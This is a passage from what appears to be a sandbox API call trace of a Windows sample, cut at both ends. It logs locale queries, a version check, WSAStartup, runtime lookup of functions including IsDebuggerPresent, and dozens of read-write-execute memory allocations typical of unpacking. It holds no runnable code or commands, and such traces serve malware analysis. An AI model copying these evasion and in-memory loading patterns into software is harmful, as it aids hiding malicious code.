LCType=0x30, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sunday") returned 7 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Mon") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Monday") returned 7 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tue") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tuesday") returned 8 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wed") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wednesday") returned 10 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thu") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thursday") returned 9 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Fri") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Friday") returned 7 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sat") returned 4 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Saturday") returned 9 [0150.453] GetThreadLocale () returned 0x409 [0150.453] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fd60, cchData=256 | out: lpLCData="$") returned 2 [0150.454] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fe58, cchData=2 | out: lpLCData=".") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fd60, cchData=256 | out: lpLCData="2") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fe58, cchData=2 | out: lpLCData="/") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fd60, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0150.460] GetThreadLocale () returned 0x409 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fd60, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0150.460] GetThreadLocale () returned 0x409 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fe58, cchData=2 | out: lpLCData=":") returned 2 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fd60, cchData=256 | out: lpLCData="AM") returned 3 [0150.460] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fd60, cchData=256 | out: lpLCData="PM") returned 3 [0150.461] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0150.461] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0150.461] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0150.461] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0150.461] GetVersionExA (in: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x218030c, dwMinorVersion=0x21802fc, dwBuildNumber=0x30, dwPlatformId=0x21222c9, szCSDVersion="Äþ\x18") | out: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0150.461] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0150.461] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceExA") returned 0x76a448ef [0150.796] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x18fd40 | out: lpWSAData=0x18fd40) returned 0 [0150.858] GetCurrentThreadId () returned 0xef0 [0150.869] VirtualAlloc (lpAddress=0x2184000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x2184000 [0151.111] GetLocalTime (in: lpSystemTime=0x18feb8 | out: lpSystemTime=0x18feb8*(wYear=0x7e6, wMonth=0x1, wDayOfWeek=0x2, wDay=0xb, wHour=0x12, wMinute=0x33, wSecond=0xa, wMilliseconds=0x26e)) [0151.112] GetSystemTime (in: lpSystemTime=0x18feb4 | out: lpSystemTime=0x18feb4*(wYear=0x7e6, wMonth=0x1, wDayOfWeek=0x2, wDay=0xb, wHour=0x11, wMinute=0x33, wSecond=0xa, wMilliseconds=0x26e)) [0151.121] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0 [0151.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0151.122] GetCurrentProcess () returned 0xffffffff [0151.122] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc | out: lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc) returned 1 [0151.168] VirtualAlloc (lpAddress=0x21a8000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x21a8000 [0151.183] VirtualFree (lpAddress=0x21c8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0151.189] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="MapViewOfFile") returned 0x769c18d1 [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceA") returned 0x769de98b [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="UnmapViewOfFile") returned 0x769c1806 [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0151.190] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileMappingA") returned 0x769c54be [0151.191] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0151.191] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0151.191] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0151.191] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0151.192] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0151.192] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0151.192] LoadLibraryA (lpLibFileName="NTDLL.DLL") returned 0x779e0000 [0151.192] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76c20000 [0151.192] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0151.192] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0151.192] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0151.192] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0151.192] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x1000, flProtect=0x40) returned 0x3a0000 [0151.193] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x1000, flProtect=0x40) returned 0x3b0000 [0151.193] VirtualAlloc (lpAddress=0x21c8000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x21c8000 [0151.199] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x3c0000 [0151.199] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3d0000 [0151.200] VirtualAlloc (lpAddress=0x0, dwSize=0x83, flAllocationType=0x1000, flProtect=0x40) returned 0x3e0000 [0151.200] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x20c0000 [0151.200] VirtualAlloc (lpAddress=0x0, dwSize=0x437, flAllocationType=0x1000, flProtect=0x40) returned 0x20d0000 [0151.201] VirtualAlloc (lpAddress=0x0, dwSize=0x1c9, flAllocationType=0x1000, flProtect=0x40) returned 0x20e0000 [0151.201] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0151.201] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2100000 [0151.201] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0151.202] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x2280000 [0151.202] VirtualAlloc (lpAddress=0x21f0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x21f0000 [0151.202] GetCurrentProcessId () returned 0xeec [0151.202] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2290000 [0151.203] VirtualAlloc (lpAddress=0x0, dwSize=0xbf, flAllocationType=0x1000, flProtect=0x40) returned 0x22a0000 [0151.203] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x22b0000 [0151.203] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x22c0000 [0151.204] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x22d0000 [0151.204] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x22e0000 [0151.204] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x1000, flProtect=0x40) returned 0x22f0000 [0151.205] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x2300000 [0151.205] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2310000 [0151.205] VirtualAlloc (lpAddress=0x0, dwSize=0x17c, flAllocationType=0x1000, flProtect=0x40) returned 0x2320000 [0151.206] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2370000 [0151.206] GetCurrentProcessId () returned 0xeec [0151.206] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2380000 [0151.206] VirtualAlloc (lpAddress=0x0, dwSize=0x284, flAllocationType=0x1000, flProtect=0x40) returned 0x2390000 [0151.208] VirtualAlloc (lpAddress=0x0, dwSize=0x37d, flAllocationType=0x1000, flProtect=0x40) returned 0x23a0000 [0151.209] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x23b0000 [0151.209] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x1000, flProtect=0x40) returned 0x23c0000 [0151.210] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x23d0000 [0151.210] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x23e0000 [0151.210] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x23f0000 [0151.211] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x27f0000 [0151.211] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2800000 [0151.212] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x2810000 [0151.212] GetCurrentProcessId () returned 0xeec [0151.212] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2820000 [0151.212] VirtualAlloc (lpAddress=0x0, dwSize=0x149, flAllocationType=0x1000, flProtect=0x40) returned 0x2830000 [0151.213] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2840000 [0151.213] VirtualAlloc (lpAddress=0x0, dwSize=0x11d, flAllocationType=0x1000, flProtect=0x40) returned 0x2850000 [0151.214] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x2860000 [0151.214] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2870000 [0151.214] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x2880000 [0151.215] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x2890000 [0151.215] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x28a0000 [0151.216] VirtualAlloc (lpAddress=0x0, dwSize=0x3b1, flAllocationType=0x1000, flProtect=0x40) returned 0x28b0000 [0151.216] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x28c0000 [0151.217] GetCurrentProcessId () returned 0xeec [0151.217] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x28d0000 [0151.217] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x28e0000 [0151.217] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x28f0000 [0151.218] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2900000 [0151.218] VirtualAlloc (lpAddress=0x0, dwSize=0x1df, flAllocationType=0x1000, flProtect=0x40) returned 0x2910000 [0151.219] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2920000 [0151.219] VirtualAlloc (lpAddress=0x0, dwSize=0x189, flAllocationType=0x1000, flProtect=0x40) returned 0x2930000 [0151.219] VirtualAlloc (lpAddress=0x0, dwSize=0x483, flAllocationType=0x1000, flProtect=0x40) returned 0x2940000 [0151.220] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2950000 [0151.220] VirtualAlloc (lpAddress=0x0, dwSize=0x247, flAllocationType=0x1000, flProtect=0x40) returned 0x2960000 [0151.221] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x2970000 [0151.221] GetCurrentProcessId () returned 0xeec [0151.221] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2980000 [0151.221] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x1000, flProtect=0x40) returned 0x2990000 [0151.222] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x29a0000 [0151.223] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x29b0000 [0151.223] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x29c0000 [0151.223] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x29d0000 [0151.224] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x29e0000 [0151.224] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x1000, flProtect=0x40) returned 0x29f0000 [0151.225] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x1000, flProtect=0x40) returned 0x2a00000 [0151.225] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2a10000 [0151.226] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2a20000 [0151.226] VirtualAlloc (lpAddress=0x21f4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x21f4000 [0151.227] GetCurrentProcessId () returned 0xeec [0151.227] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2a30000 [0151.227] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2a40000 [0151.228] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2a50000 [0151.228] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2a60000 [0151.229] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x2a70000 [0151.229] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2a80000 [0151.229] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x2a90000 [0151.230] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2aa0000 [0151.230] VirtualAlloc (lpAddress=0x0, dwSize=0x17e, flAllocationType=0x1000, flProtect=0x40) returned 0x2ab0000 [0151.231] VirtualAlloc (lpAddress=0x0, dwSize=0x1b1, flAllocationType=0x1000, flProtect=0x40) returned 0x2ac0000 [0151.231] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2ad0000 [0151.232] GetCurrentProcessId () returned 0xeec [0151.232] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2ae0000 [0151.232] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x1000, flProtect=0x40) returned 0x2af0000 [0151.232] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2b00000 [0151.233] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2b10000 [0151.233] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2b20000 [0151.234] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2b30000 [0151.234] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x1000, flProtect=0x40) returned 0x2b40000 [0151.234] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2b50000 [0151.235] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2b60000 [0151.235] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2b70000 [0151.236] VirtualAlloc (lpAddress=0x0, dwSize=0x328, flAllocationType=0x1000, flProtect=0x40) returned 0x2b80000 [0151.236] GetCurrentProcessId () returned 0xeec [0151.236] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2b90000 [0151.237] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2ba0000 [0151.237] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2bb0000 [0151.238] VirtualAlloc (lpAddress=0x0, dwSize=0x1a2, flAllocationType=0x1000, flProtect=0x40) returned 0x2bc0000 [0151.238] VirtualAlloc (lpAddress=0x0, dwSize=0x8d, flAllocationType=0x1000, flProtect=0x40) returned 0x2bd0000 [0151.238] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2be0000 [0151.239] VirtualAlloc (lpAddress=0x0, dwSize=0x293, flAllocationType=0x1000, flProtect=0x40) returned 0x2bf0000 [0151.239] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2c00000 [0151.240] VirtualAlloc (lpAddress=0x0, dwSize=0x14f, flAllocationType=0x1000, flProtect=0x40) returned 0x2c10000 [0151.240] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c20000 [0151.241] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2c30000 [0151.241] GetCurrentProcessId () returned 0xeec [0151.241] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2c40000 [0151.241] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2c50000 [0151.242] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c60000 [0151.242] VirtualAlloc (lpAddress=0x0, dwSize=0x1bc, flAllocationType=0x1000, flProtect=0x40) returned 0x2c70000 [0151.243] VirtualAlloc (lpAddress=0x0, dwSize=0x2c1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c80000 [0151.243] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2c90000 [0151.243] VirtualAlloc (lpAddress=0x0, dwSize=0xdd, flAllocationType=0x1000, flProtect=0x40) returned 0x2ca0000 [0151.244] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x1000, flProtect=0x40) returned 0x2cb0000 [0151.244] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2cc0000 [0151.245] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2cd0000 [0151.245] VirtualAlloc (lpAddress=0x0, dwSize=0xc3, flAllocationType=0x1000, flProtect=0x40) returned 0x2ce0000 [0151.245] VirtualAlloc (lpAddress=0x21f8000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x21f8000 [0151.246] GetCurrentProcessId () returned 0xeec [0151.246] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2cf0000 [0151.246] VirtualAlloc (lpAddress=0x0, dwSize=0xc7, flAllocationType=0x1000, flProtect=0x40) returned 0x2d00000 [0151.246] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2d10000 [0151.247] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2d20000 [0151.247] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x2d30000 [0151.247] VirtualAlloc (lpAddress=0x0, dwSize=0x272, flAllocationType=0x1000, flProtect=0x40) returned 0x2d40000 [0151.248] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2d50000 [0151.248] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x2d60000 [0151.248] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x1000, flProtect=0x40) returned 0x2d70000 [0151.249] VirtualAlloc (lpAddress=0x0, dwSize=0xe3, flAllocationType=0x1000, flProtect=0x40) returned 0x2d80000 [0151.249] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2d90000 [0151.249] GetCurrentProcessId () returned 0xeec [0151.249] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2da0000 [0151.250] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x2db0000 [0151.250] VirtualAlloc (lpAddress=0x0, dwSize=0xe1, flAllocationType=0x1000, flProtect=0x40) returned 0x2dc0000 [0151.251] VirtualAlloc (lpAddress=0x0, dwSize=0x7b, flAllocationType=0x1000, flProtect=0x40) returned 0x2dd0000 [0151.251] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x2de0000 [0151.251] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x2df0000 [0151.252] VirtualAlloc (lpAddress=0x0, dwSize=0x399, flAllocationType=0x1000, flProtect=0x40) returned 0x2e00000 [0151.252] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x2e10000 [0151.253] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2e20000 [0151.253] VirtualAlloc (lpAddress=0x0, dwSize=0x133, flAllocationType=0x1000, flProtect=0x40) returned 0x2e30000 [0151.254] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2e40000 [0151.254] GetCurrentProcessId () returned 0xeec [0151.254] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2e50000 [0151.255] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2e60000 [0151.255] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x1000, flProtect=0x40) returned 0x2e70000 [0151.256] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x2e80000 [0151.256] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x2e90000 [0151.256] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2ea0000 [0151.257] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x2eb0000 [0151.257] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2ec0000 [0151.258] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2ed0000 [0151.258] VirtualAlloc (lpAddress=0x0, dwSize=0x1af, flAllocationType=0x1000, flProtect=0x40) returned 0x2ee0000 [0151.258] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x2ef0000 [0151.259] GetCurrentProcessId () returned 0xeec [0151.259] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2f00000 [0151.259] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x2f10000 [0151.259] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f20000 [0151.260] VirtualAlloc (lpAddress=0x0, dwSize=0x65, flAllocationType=0x1000, flProtect=0x40) returned 0x2f30000 [0151.260] VirtualAlloc (lpAddress=0x0, dwSize=0x3a6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f40000 [0151.261] VirtualAlloc (lpAddress=0x0, dwSize=0x139, flAllocationType=0x1000, flProtect=0x40) returned 0x2f50000 [0151.261] VirtualAlloc (lpAddress=0x0, dwSize=0x388, flAllocationType=0x1000, flProtect=0x40) returned 0x2f60000 [0151.261] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x1000, flProtect=0x40) returned 0x2f70000 [0151.262] VirtualAlloc 